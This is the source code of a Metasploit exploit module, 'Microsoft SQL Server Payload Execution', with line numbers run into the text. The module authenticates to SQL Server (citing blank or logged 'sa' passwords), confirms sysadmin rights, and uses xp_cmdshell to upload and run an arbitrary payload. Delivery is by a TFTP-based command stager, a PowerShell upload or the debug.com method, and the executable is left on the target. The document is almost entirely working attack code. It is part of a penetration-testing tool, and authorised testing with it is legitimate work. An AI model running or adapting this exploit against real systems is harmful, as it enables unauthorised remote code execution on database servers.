Path: blob/master/modules/exploits/windows/mssql/mssql_payload.rb
19669 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::MSSQL9include Msf::Exploit::CmdStager10include Msf::OptionalSession::MSSQL11# include Msf::Exploit::CmdStagerDebugAsm12# include Msf::Exploit::CmdStagerDebugWrite13# include Msf::Exploit::CmdStagerTFTP1415def initialize(info = {})16super(17update_info(18info,19'Name' => 'Microsoft SQL Server Payload Execution',20'Description' => %q{21This module executes an arbitrary payload on a Microsoft SQL Server by using22the "xp_cmdshell" stored procedure. Currently, three delivery methods are supported.2324First, the original method uses Windows 'debug.com'. File size restrictions are25avoided by incorporating the debug bypass method presented by SecureStat at26Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.2728A second method takes advantage of the Command Stager subsystem. This allows using29various techniques, such as using a TFTP server, to send the executable. By default30the Command Stager uses 'wcsript.exe' to generate the executable on the target.3132Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the33payload on the target.3435NOTE: This module will leave a payload executable on the target system when the36attack is finished.37},38'Author' => [39'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>', # original module, debug.exe method, powershell method40'jduck' # command stager mods41],42'License' => MSF_LICENSE,43'References' => [44# 'sa' password in logs45[ 'CVE', '2000-0402' ],46[ 'OSVDB', '557' ],47[ 'BID', '1281' ],4849# blank default 'sa' password50[ 'CVE', '2000-1209' ],51[ 'OSVDB', '15757' ],52[ 'BID', '4797' ]53],54'Platform' => 'win',55'Arch' => [ ARCH_X86, ARCH_X64 ],56'Targets' => [57[ 'Automatic', {} ],58],59'CmdStagerFlavor' => 'vbs',60'DefaultTarget' => 0,61'DisclosureDate' => '2000-05-30',62'Notes' => {63'Reliability' => UNKNOWN_RELIABILITY,64'Stability' => UNKNOWN_STABILITY,65'SideEffects' => UNKNOWN_SIDE_EFFECTS66}67)68)69register_options(70[71OptString.new('METHOD', [ true, 'Which payload delivery method to use (ps, cmd, or old)', 'cmd' ])72]73)74end7576def check77if session78set_mssql_session(session.client)79end8081unless session || mssql_login_datastore82vprint_status("Invalid SQL Server credentials")83return Exploit::CheckCode::Detected84end8586mssql_query("select @@version", true)87if mssql_is_sysadmin88vprint_good "User #{datastore['USERNAME']} is a sysadmin"89Exploit::CheckCode::Vulnerable90else91Exploit::CheckCode::Safe92end93ensure94disconnect95end9697# This is method required for the CmdStager to work...98def execute_command(cmd, opts)99mssql_xpcmdshell(cmd, datastore['VERBOSE'])100end101102def exploit103if session104set_mssql_session(session.client)105else106unless mssql_login_datastore107print_status("Invalid SQL Server credentials")108return109end110end111112method = datastore['METHOD'].downcase113114if (method =~ /^cmd/)115tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']116execute_cmdstager({ linemax: 1500, tftphost: tftphost, nodelete: true })117else118# Generate the EXE, this is the same no matter what delivery mechanism we use119exe = generate_payload_exe120121# Use powershell method for payload delivery if specified122if (method =~ /^ps/) or (method =~ /^power/)123powershell_upload_exec(exe)124else125# Otherwise, fall back to the old way..126mssql_upload_exec(exe, datastore['VERBOSE'])127end128end129130handler131disconnect132end133end134135136